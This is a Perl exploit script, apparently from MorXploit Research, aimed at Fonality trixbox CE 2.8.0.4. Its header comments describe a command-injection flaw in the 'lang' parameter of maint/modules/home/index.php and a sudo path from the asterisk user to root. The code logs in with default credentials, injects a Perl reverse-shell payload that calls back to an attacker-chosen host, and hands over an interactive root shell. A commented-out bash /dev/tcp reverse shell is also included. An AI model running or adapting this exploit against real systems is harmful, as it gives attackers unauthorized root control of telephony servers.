#!/usr/bin/perl
#
# Title: Fonality trixbox CE remote root exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered & Coded: 2 June 2014
# Published: 17 October 2014
# MorXploit Research
# Software: trixbox CE
# Version: trixbox-2.8.0.4.iso
# Vendor url: http://www.fonality.com/
# Vulnerable file: maint/modules/home/index.php
#
# Description:
# maint/modules/home/index.php suffers from a command execution vulnerability, allowing an authenticated user to inject commands as the
# asterisk user which then can be leverged to root privilege through sudo.
#
# from /etc/sudoers:
## asterisk ALL = NOPASSWD: /bin/bash
#
# Vulnerable code:
# Line 68: $tbLang = $_GET['lang'];
# Line 339: shell_exec $phpOutput = shell_exec('php -q libs/status.php ' . $tbLang);
#
# Note:
# We did a full audit of Fonality trixbox CE 2.8.0.4 and we found several similar vulnerabilities (File disclosure, command/code execution etc).
# We didn't think it was necessary to cover all the findings since support for the CE edition has been discontinued
# but anyone who thinks about installing this should think twice.
#
# Download:
#
# Demo:
# perl trixbox.pl http://10.0.0.16 10.0.0.2 1111
#
# ===================================================
# --- Fonality trixbox remote root exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] MorXploiting http://10.0.0.16/maint/modules/home/index.php
# [+] Sent payload! Waiting for connect back root shell ...
# [+] Et voila you are in!
#
# Linux trixbox1.localdomain 2.6.18-164.11.1.el5 #1 SMP Wed Jan 20 07:39:04 EST 2010 i686 i686 i386 GNU/Linux
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
use
LWP::UserAgent;
use
MIME::Base64;
use
IO::
Socket
;
use
strict;
sub
banner {
system
(($^O eq
'MSWin32'
) ?
'cls'
:
'clear'
);
print
"===================================================\n"
;
print
"--- Fonality trixbox CE remote root exploit\n"
;
print
"--- By: Simo Ben youssef <simo_at_morxploit_com>\n"
;
print
"--- MorXploit Research www.MorXploit.com\n"
;
print
"===================================================\n"
;
}
if
(!
defined
(
$ARGV
[0] &&
$ARGV
[1] &&
$ARGV
[2])) {
banner();
print
"perl $0 <target> <connectbackIP> <connectbackport>\n"
;
exit
;
}
my
$host
=
$ARGV
[0];
my
$vuln
=
"maint/modules/home/index.php"
;
my
$cbhost
=
$ARGV
[1];
my
$cbport
=
$ARGV
[2];
my
$defuser
=
"maint"
;
# Default maint user
my
$defpass
=
"password"
;
# Default maint pass
my
$string
=
"$defuser:$defpass"
;
my
$encoded
= encode_base64(
$string
);
$| = 1;
$SIG
{CHLD} =
'IGNORE'
;
my
$l_sock
= IO::
Socket
::INET->new(
Proto =>
"tcp"
,
LocalPort =>
"$cbport"
,
Listen
=> 1,
LocalAddr =>
"0.0.0.0"
,
Reuse => 1,
) or
die
"[-] Could not listen on $cbport: $!\n"
;
sub
randomagent {
my
@array
= (
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'
,
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0'
,
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)'
,
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36'
,
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36'
,
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my
$random
=
$array
[
rand
@array
];
return
(
$random
);
}
my
$useragent
= randomagent();
my
$ua
= LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua
->timeout(10);
$ua
->agent(
$useragent
);
my
$status
=
$ua
->get(
"$host/$vuln"
, Authorization =>
"Basic $encoded"
);
unless
(
$status
->is_success) {
banner();
print
"[-] Error: "
.
$status
->status_line .
"\n"
;
exit
;
}
banner();
print
"[*] MorXploiting $host/$vuln\n"
;
#my $payload = "sudo /bin/bash -i >%26 /dev/tcp/$cbhost/$cbport 0>%261"; # Bash connect back
my
$payload
=
"sudo /bin/bash -c \"perl -e '\\\$p=fork;exit,if(\\\$p); use Socket; use FileHandle; my \\\$system = \\\"/bin/sh\\\"; my \\\$host = \\\"$cbhost\\\"; my \\\$port = \\\"$cbport\\\";socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(\\\"tcp\\\")); connect(SOCKET, sockaddr_in(\\\$port, inet_aton(\\\$host))); SOCKET->autoflush(); open(STDIN, \\\">%26SOCKET\\\"); open(STDOUT,\\\">%26SOCKET\\\"); open(STDERR,\\\">%26SOCKET\\\"); print \\\"[%2b] Et voila you are in!\\\\n\\\\n\\\"; system(\\\"uname -a;id\\\"); system(\\\$system);'\""
;
my
$exploit
=
$ua
->get(
"$host/$vuln?lang=;$payload"
, Authorization =>
"Basic $encoded"
);
print
"[+] Sent payload! Waiting for connect back root shell ...\n"
;
my
$a_sock
=
$l_sock
->
accept
();
$l_sock
->
shutdown
(SHUT_RDWR);
copy_data_bidi(
$a_sock
);
sub
copy_data_bidi {
my
(
$socket
) =
@_
;
my
$child_pid
=
fork
();
if
(!
$child_pid
) {
close
(STDIN);
copy_data_mono(
$socket
, *STDOUT);
$socket
->
shutdown
(SHUT_RD);
exit
();
}
else
{
close
(STDOUT);
copy_data_mono(*STDIN,
$socket
);
$socket
->
shutdown
(SHUT_WR);
kill
(
"TERM"
,
$child_pid
);
}
}
sub
copy_data_mono {
my
(
$src
,
$dst
) =
@_
;
my
$buf
;
while
(
my
$read_len
=
sysread
(
$src
,
$buf
, 4096)) {
my
$write_len
=
$read_len
;
while
(
$write_len
) {
my
$written_len
=
syswrite
(
$dst
,
$buf
);
return
unless
$written_len
;
$write_len
-=
$written_len
;
}
}
}